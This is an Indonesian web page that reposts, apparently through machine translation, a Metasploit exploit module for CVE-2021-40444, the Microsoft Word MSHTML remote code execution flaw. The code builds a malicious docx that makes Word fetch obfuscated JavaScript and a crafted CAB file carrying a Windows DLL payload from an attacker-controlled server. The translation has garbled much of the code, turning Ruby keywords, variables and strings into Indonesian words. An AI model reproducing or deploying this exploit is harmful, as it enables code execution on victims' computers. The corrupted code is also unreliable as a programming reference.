Eksekusi Kode Jarak Jauh Microsoft Office Word MSHTML

  • Whatsapp
Eksekusi Kode Jarak Jauh Microsoft Office Word MSHTML
Eksekusi Kode Jarak Jauh Microsoft Office Word MSHTML

News.nextcloud.asia

##
# Modul ini membutuhkan Metasploit: https://metasploit.com/download
# Sumber saat ini: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Eksploitasi::Remote
Peringkat = Peringkat Luar Biasa

sertakan Msf::Eksploitasi::FILEFORMAT
sertakan Msf::Eksploitasi::Remote::HttpServer::HTML

def inisialisasi(info = {})
super(
update_info(
informasi,
‘Name’ => ‘Microsoft Office Word Berbahaya MSHTML RCE’,
‘Deskripsi’ => %q{
Modul ini membuat file docx berbahaya yang ketika dibuka di Word pada Windows yang rentan
sistem akan mengarah pada eksekusi kode. Kerentanan ini ada karena penyerang dapat
buat kontrol ActiveX berbahaya untuk digunakan oleh dokumen Microsoft Office yang menghosting
mesin rendering browser.
},
‘Referensi’ => [
[‘CVE’, ‘2021-40444’],
[‘URL’, ‘https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444’],
[‘URL’, ‘https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/’],
[‘URL’, ‘http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf’],
[‘URL’, ‘https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md’],
[‘URL’, ‘https://github.com/klezVirus/CVE-2021-40444’]
],
‘Penulis’ => [
‘lockedbyte ‘, # Vulnerability discovery.
‘klezVirus ‘, # References and PoC.
‘thesunRider’, # Official Metasploit module.
‘mekhalleh (RAMELLA Sébastien)’ # Zeop-CyberSecurity – code base contribution and refactoring.
],
‘DisclosureDate’ => ’21-09-23′,
‘Lisensi’ => MSF_LICENSE,
‘Hak Istimewa’ => salah,
‘Platform’ => ‘menang’,
‘Lengkungan’ => [ARCH_X64],
‘Muatan’ => {
‘DisableNops’ => benar
},
‘Opsi Default’ => {
‘FILENAME’ => ‘msf.docx’
},
‘Target’ => [
[
‘Hosted’, {}
]
],
‘Target Default’ => 0,
‘Catatan’ => {
‘Stabilitas’ => [CRASH_SAFE],
‘Keandalan’ => [UNRELIABLE_SESSION],
‘Efek Samping’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

daftar_pilihan([
OptBool.new(‘OBFUSCATE’, [true, ‘Obfuscate JavaScript content.’, true])
])
register_advanced_options([
OptPath.new(‘DocxTemplate’, [ false, ‘A DOCX file that will be used as a template to build the exploit.’ ]),
])
akhir

def bin_to_hex(bstr)
return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, ‘0’) }.join)
akhir

def cab_checksum(data, seed = “x00x00x00x00”)
checksum = benih

byte=””
data.chars.each_slice(4).map(&:join).each do |dword|
jika dword.length == 4
checksum = checksum.unpack(‘C*’).zip(dword.unpack(‘C*’)).map { |a, b| a ^ b }.pack(‘C*’)
kalau tidak
byte = dword
akhir
akhir
checksum = checksum.reverse

kasus (data.length % 4)
kapan 3
dword = “x00#{byte}”
ketika 2
dword = “x00x00#{byte}”
ketika 1
dword = “x00x00x00#{byte}”
kalau tidak
dword = “x00x00x00x00”
akhir

checksum = checksum.unpack(‘C*’).zip(dword.unpack(‘C*’)).map { |a, b| a ^ b }.pack(‘C*’).reverse
akhir

# http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf
def create_cab(data)
cab_cfdata=””
namafile = “../#{File.basename(@my_resources.first)}.inf”
ukuran_blok = 32768
struct_cffile = 0xd
struct_cfheader = 0x30

block_counter = 0
data.chars.each_slice(block_size).map(&:join).each do |block|
block_counter += 1

benih = “#{[block.length].pack(‘S’)}#{[block.length].pack(‘S’)}”
csum = cab_checksum(blok, seed)

vprint_status(“Blok data ditambahkan dengan checksum: #{bin_to_hex(csum)}”)
cab_cfdata << csum # uint32 {4} - Checksum
cab_cfdata << [block.length].pack('S') # uint16 {2} - Panjang Data Terkompresi
cab_cfdata << [block.length].pack('S') # uint16 {2} - Panjang Data Tidak Terkompresi
cab_cfdata << blok
akhir

taksi_ukuran = [
struct_cfheader +
struct_cffile +
filename.length +
cab_cfdata.length
].pack(‘L<')

# CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)
cab_header = “x4Dx53x43x46” # uint32 {4} – Header (MSCF)
cab_header << "x00x00x00x00" # uint32 {4} - Dicadangkan (null)
cab_header << cab_size # uint32 {4} - Panjang Arsip
cab_header << "x00x00x00x00" # uint32 {4} - Dicadangkan (null)

cab_header << "x2Cx00x00x00" # uint32 {4} - Offset ke CFFILE pertama
cab_header << "x00x00x00x00" # uint32 {4} - Dicadangkan (null)
cab_header << "x03" # byte {1} - Versi Kecil (3)
cab_header << "x01" # byte {1} - Versi Utama (1)
cab_header << "x01x00" # uint16 {2} - Jumlah Folder
cab_header << "x01x00" # uint16 {2} - Jumlah File
cab_header << "x00x00" # uint16 {2} - Bendera

cab_header << "xD2x04" # uint16 {2} - Nomor ID Set Kabinet
cab_header << "x00x00" # uint16 {2} - Nomor urut file Kabinet ini dalam satu Set

# CFFOLDER
cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder
struct_cfheader +
struct_cffile +
filename.length
].pack(‘L<')
cab_header << [block_counter].pack('S<') # uint16 {2} - Jumlah blok CFDATA di Folder ini
cab_header << "x00x00" # uint16 {2} - Format Kompresi untuk setiap CFDATA dalam Folder ini (1 = MSZIP)

# tingkatkan ukuran file untuk memicu kerentanan
cab_header << [ # uint32 {4} - Uncompressed File Length ("x02x00x5Cx41")
data.length + 1073741824
].pack(‘L<')

# atur tanggal dan waktu saat ini dalam format file taksi
date_time = Waktu.baru
tanggal = [((date_time.year – 1980) << 9) + (date_time.month << 5) + date_time.day].pack(‘S’)
waktu = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack(‘S’)

# CFFILE
cab_header << "x00x00x00x00" # uint32 {4} - Offset dalam CFDATA Tidak Terkompresi untuk Folder milik file ini (relatif terhadap awal CFDATA Tidak Terkompresi untuk Folder ini)
cab_header << "x00x00" # uint16 {2} - ID Folder (dimulai dari 0)
cab_header << tanggal # uint16 {2} - Tanggal Berkas (x5Ax53)
cab_header << waktu # uint16 {2} - Waktu File (xC3x5C)
cab_header << "x20x00" # uint16 {2} - Atribut File
cab_header << nama file # byte {X} - Nama file (ASCII)
cab_header << "x00" # byte {1} - null Terminator Nama Berkas

cab_stream = cab_header

#CFDATA
cab_stream << cab_cfdata
akhir

def generate_html
uri = “#{@proto}://#{datastore[‘SRVHOST’]}:#{penyimpanan data[‘SRVPORT’]}#{normalize_uri(@my_resources.first.to_s)}.cab”
inf = “#{File.basename(@my_resources.first)}.inf”

file_path = ::File.join(::Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-40444’, ‘cve_2021_40444.js’)
js_content = ::File.binread(file_path)

js_content.gsub!(‘REPLACE_INF’, inf)
js_content.gsub! (‘REPLACE_URI’, uri)
jika penyimpanan data[‘OBFUSCATE’]
print_status(‘Mengaburkan konten JavaScript’)

js_content = Rex::Eksploitasi::JSObfu.new js_content
js_content = js_content.obfuscate(memori_sensitif: salah)
akhir

html=”
html
akhir

def get_file_in_docx(namaf)
i = @docx.find_index { |item| barang[:fname] == nama belakang }

kecuali aku
fail_with(Failure::NotFound, “Template ini tidak dapat digunakan karena tidak ada: #{fname}”)
akhir

@docx.fetch(i)[:data]
akhir

def get_template_path
penyimpanan data[‘DocxTemplate’] || File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-40444’, ‘cve-2021-40444.docx’)
akhir

def inject_docx
document_xml = get_file_in_docx(‘word/document.xml’)
kecuali document_xml
fail_with(Failure::NotFound, ‘Template ini tidak dapat digunakan karena tidak ada: word/document.xml’)
akhir

document_xml_rels = get_file_in_docx(‘word/_rels/document.xml.rels’)
kecuali document_xml_rels
fail_with(Failure::NotFound, ‘Template ini tidak dapat digunakan karena tidak ada: word/_rels/document.xml.rels’)
akhir

uri = “#{@proto}://#{datastore[‘SRVHOST’]}:#{penyimpanan data[‘SRVPORT’]}#{normalize_uri(@my_resources.first.to_s)}.html”
@docx.setiap lakukan |entri|
entri kasus[:fname]
ketika ‘word/document.xml’
pintu masuk[:data] = document_xml.to_s.gsub!(‘TARGET_HERE’, uri.to_s)
ketika ‘word/_rels/document.xml.rels’
pintu masuk[:data] = document_xml_rels.to_s.gsub!(‘TARGET_HERE’, “mhtml:#{uri}!x-usc:#{uri}”)
akhir
akhir
akhir

def normalize_uri(*strs)
new_str = str * ‘/’

new_str = new_str.gsub!(‘//’, ‘/’) while new_str.index(‘//’)

# pastikan ada garis miring
kecuali new_str[0, 1] == ‘/’
new_str=”/” + new_str
akhir

baru_str
akhir

def on_request_uri(kli, permintaan)
header_cab = {
‘Access-Control-Allow-Origin’ => ‘*’,
‘Access-Control-Allow-Methods’ => ‘DAPATKAN, POSTING, OPSI’,
‘Cache-Control’ => ‘tanpa penyimpanan, tanpa cache, harus divalidasi ulang’,
‘Content-Type’ => ‘aplikasi/octet-stream’,
‘Content-Disposition’ => “lampiran; namafile=#{File.basename(@my_resources.first)}.cab”
}

header_html = {
‘Access-Control-Allow-Origin’ => ‘*’,
‘Access-Control-Allow-Methods’ => ‘DAPATKAN, POSTING’,
‘Cache-Control’ => ‘tanpa penyimpanan, tanpa cache, harus divalidasi ulang’,
‘Tipe-Konten’ => ‘teks/html; rangkaian karakter = UTF-8’
}

jika request.method.eql? ‘KEPALA’
jika request.raw_uri.to_s.end_with? ‘.taksi’
send_response(cli, ”, header_cab)
kalau tidak
send_response(cli, ”, header_html)
akhir
elsif request.method.eql? ‘PILIHAN’
response = create_response(501, ‘Metode Tidak Didukung’)
tanggapan[‘Content-Type’] = ‘teks/html’
respon.body = ”

cli.send_response(tanggapan)
elsif request.raw_uri.to_s.end_with? ‘.html’
print_status(‘Mengirim Muatan HTML’)

send_response_html(cli, generate_html, header_html)
elsif request.raw_uri.to_s.end_with? ‘.taksi’
print_status(‘Mengirim Payload CAB’)

send_response(cli, create_cab(@dll_payload), header_cab)
akhir
akhir

def pack_docx
@docx.setiap lakukan |entri|
jika masuk[:data].is_a?(Nokogiri::XML::Document)
pintu masuk[:data] = masuk[:data].to_s
akhir
akhir

Msf::Util::EXE.to_zip(@docx)
akhir

def membongkar_docx(template_path)
dokumen = []

Zip::File.open(template_path) lakukan |entri|
entri.setiap lakukan |entri|
jika entri.nama.match(/.xml|.rels$/i)
konten = Nokogiri::XML(entry.get_input_stream.read) if entry.file?
elf entri.file?
konten = entri.get_input_stream.read
akhir

vprint_status(“Mengurai item dari template: #{entry.name}”)

dokumen << { fname: entri.nama, data: konten }
akhir
akhir

dokumen
akhir

def primer
print_status(‘CVE-2021-40444: Hasilkan file docx berbahaya’)

@proto = (penyimpanan data[‘SSL’] ? ‘https’ : ‘http’)
jika penyimpanan data[‘SRVHOST’] == ‘0.0.0.0’
penyimpanan data[‘SRVHOST’] = Rex::Socket.source_address
akhir

template_path = get_template_path
kecuali File.extname(template_path).match(/.docx$/i)
fail_with(Failure::BadConfig, ‘Template bukan file docx!’)
akhir

print_status(“Menggunakan template ‘#{template_path}'”)
@docx = membongkar_docx(template_path)

print_status(‘Menyuntikkan muatan dalam dokumen docx’)
inject_docx

print_status(“Menyelesaikan docx ‘#{datastore[‘FILENAME’]}'”)
file_create(paket_docx)

@dll_payload = Msf::Util::EXE.to_win64pe_dll(
kerangka,
payload. dikodekan,
{
lengkungan: payload.arch.first,
campuran_mode: benar,
platform: ‘menang’
}
)
akhir
akhir

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.